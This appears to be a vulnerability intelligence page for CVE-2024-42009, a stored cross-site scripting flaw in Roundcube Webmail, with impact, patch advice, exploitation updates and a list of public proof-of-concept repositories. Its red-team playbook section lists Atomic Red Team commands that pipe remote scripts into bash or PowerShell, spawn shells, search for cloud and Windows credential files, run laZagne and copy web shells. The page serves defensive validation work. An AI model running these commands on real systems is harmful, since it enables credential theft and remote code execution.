CVE-2024-42009
Overview
This vulnerability is a Cross-Site Scripting (XSS) flaw caused by improper sanitization of user-supplied content within the message_body() function in the mail display component of Roundcube Webmail. The root cause lies in a desanitization issue in program/actions/mail/show.php, which fails to correctly neutralize malicious scripts embedded in email message bodies. This flaw affects Roundcube versions 1.5.7 and 1.6.x through 1.6.7, specifically the message rendering feature of the webmail interface.
Vulnerability Description
A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.
Impact
An unauthenticated attacker can exploit this vulnerability by sending a specially crafted email to a victim using the vulnerable Roundcube Webmail versions. When the victim views the malicious message, the attacker’s script executes in the victim’s browser context, enabling theft and unauthorized sending of the victim’s emails. This leads to exposure of sensitive email content and potential further compromise of the victim’s communications and privacy.
Solution
Upgrade Roundcube Webmail to versions 1.5.8 or 1.6.8 as released by the vendor. These versions address the desanitization issue in message_body() and mitigate the XSS vulnerability. Refer to the official Roundcube security update announcement at https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8 and the GitHub release notes for detailed patch instructions and version downloads.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identified Cross-Site Scripting (XSS) vulnerability in the Roundcube webmail application is rooted in a desanitization flaw within the message_body() function located in the program/actions/mail/show.php file. This vulnerability allows an attacker to inject malicious scripts into email messages that are rendered by the Roundcube client. When a victim views an email containing the crafted payload, the malicious script executes within the context of the victim's browser. This execution can lead to unauthorized actions such as stealing sensitive information, including session cookies, or even sending emails on behalf of the victim, thereby compromising their account further.
Attack vectors for this vulnerability are particularly concerning due to the common use of email as a communication channel. An attacker can exploit this flaw by sending a specially crafted email to a target user. Once the victim opens the email, the embedded script executes, allowing the attacker to manipulate the victim's session or extract sensitive data. This scenario is exacerbated by the fact that many users may not be aware of the risks associated with viewing emails from unknown or untrusted sources. Additionally, the ease of crafting such emails makes this vulnerability attractive to attackers, as it requires minimal technical expertise to exploit.
The real-world impact of this vulnerability can be significant for organizations that rely on Roundcube for email communication. The potential for data theft, unauthorized email sending, and the subsequent loss of trust from clients and partners poses a considerable business risk. Organizations may face reputational damage, legal ramifications, and financial losses due to data breaches or compliance violations. Furthermore, the high CVSS score of 9.3 indicates that the vulnerability is critical, necessitating immediate attention to mitigate potential exploitation.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the Roundcube application to the latest version is crucial, as patches are often released to address known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the application. Security awareness training for users is also essential, educating them on the risks of opening suspicious emails and the importance of verifying the sender's identity. Furthermore, implementing Content Security Policy (CSP) headers can help mitigate the impact of XSS vulnerabilities by restricting the sources from which scripts can be executed.
In conclusion, the Cross-Site Scripting vulnerability in Roundcube presents a serious threat to both users and organizations. The ability for an attacker to execute scripts in the context of a victim's session can lead to significant data breaches and operational disruptions. Organizations must prioritize detection and mitigation strategies to protect their users and maintain the integrity of their email communications. By staying vigilant and proactive in their security measures, organizations can reduce the risk associated with this and similar vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2024-42009, evidenced by the emergence of new proof-of-concept exploits publicly available on multiple platforms. Our telemetry indicates that adversaries are increasingly leveraging these tools to weaponize the stored XSS vulnerability in Roundcube Webmail versions up to 1.6.7. This development significantly broadens the exploit landscape, lowering the barrier for threat actors to conduct sophisticated email exfiltration attacks. Although the EPSS score remains stable, the introduction of diverse exploitation scripts enhances the likelihood of opportunistic and targeted campaigns, elevating the overall threat level. Defenders should recognize that the vulnerability is no longer theoretical but actively exploited in the wild, underscoring an urgent need to monitor for related indicators of compromise and anomalous email behaviors.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-42009, accompanied by the emergence of several new proof-of-concept exploit scripts publicly available on code repositories. This expansion in exploit tools lowers the technical barrier for adversaries to weaponize the vulnerability, increasing the potential for widespread abuse. Despite a slight decline in the EPSS score, our telemetry indicates that attacker interest and activity are intensifying, suggesting a shift from opportunistic probing to more deliberate exploitation efforts. The increased visibility of exploit code also raises the risk of integration into automated attack frameworks, which could accelerate the pace and scale of compromise attempts. Consequently, the threat level associated with this vulnerability has escalated from theoretical to actively exploited, underscoring a heightened operational risk for organizations running affected Roundcube Webmail versions.
Update 3 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-42009, evidenced by a substantial increase in telemetry signals and a modest rise in the EPSS score. This surge coincides with the recent inclusion of the vulnerability in the KEV catalog, which may be driving heightened attacker focus and accelerating weaponization efforts. Concurrently, multiple new proof-of-concept exploits have emerged on public platforms, broadening the accessibility of attack methods and lowering the barrier for adversaries to leverage this critical XSS flaw. The convergence of increased exploitation activity and expanded exploit availability signals a transition from limited, opportunistic probing to more systematic and widespread attack campaigns. For defenders, this development elevates the urgency of monitoring and detection, as the likelihood of successful compromise attempts against vulnerable Roundcube Webmail instances has intensified. Consequently, the threat level associated with CVE-2024-42009 has escalated to a confirmed active exploitation phase, underscoring an elevated operational risk that demands heightened vigilance.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
|
|
Roundcube | Webmail | All |
cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (6)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
DaniTheHack3r/CVE-2024-42009-PoC
CVE-2024-42009 Proof of Concept
|
DaniTheHack3r | 7 | 1 | 2025-05-24 | View |
|
0xbassiouny1337/CVE-2024-42009
This script exploits a stored XSS vulnerability (CVE-2024-42009) in Roundcube Webmail version 1.6.7. It injects a malici...
|
0xbassiouny1337 | 4 | 0 | 2025-02-11 | View |
|
ZaidArif47/CVE-2024-42009
|
ZaidArif47 | 1 | 0 | 2026-04-16 | View |
|
Bhanunamikaze/CVE-2024-42009
This Proof of Concept (PoC) demonstrates an exploit for CVE-2024-42009, leveraging a cross-site scripting (XSS) vulnerab...
|
Bhanunamikaze | 1 | 0 | 2025-02-13 | View |
|
segunakinsoyinu/CVE-2024-42009-roundcube-xss
|
segunakinsoyinu | 0 | 0 | 2026-06-17 | View |
|
Shubhankargupta691/CVE-2024-42009
|
Shubhankargupta691 | 0 | 0 | 2025-09-14 | View |
Threat Feed
8 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-42009 |
| github.com |
GitHub CVE
|
https://github.com/roundcube/roundcubemail/releases |
| sonarsource.com |
GitHub CVE
|
https://sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/ |
| github.com |
GitHub CVE
|
https://github.com/roundcube/roundcubemail/releases/tag/1.5.8 |
| github.com |
GitHub CVE
|
https://github.com/roundcube/roundcubemail/releases/tag/1.6.8 |
| roundcube.net |
GitHub CVE
|
https://roundcube.net/news/2024/08/04/security-updates-1.6.8-and-1.5.8 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-42009 |